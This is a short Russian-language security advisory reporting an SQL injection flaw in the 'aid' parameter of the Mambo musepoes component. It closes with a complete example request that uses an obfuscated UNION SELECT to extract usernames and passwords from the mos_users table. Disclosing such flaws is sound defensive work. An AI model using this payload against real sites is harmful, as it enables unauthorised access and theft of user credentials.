Программа: Mambo Component musepoes
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «aid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
index.php?option=com_musepoes&task=answer&Itemid=s@bun& catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a, 0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/* */from/**/mos_users/*
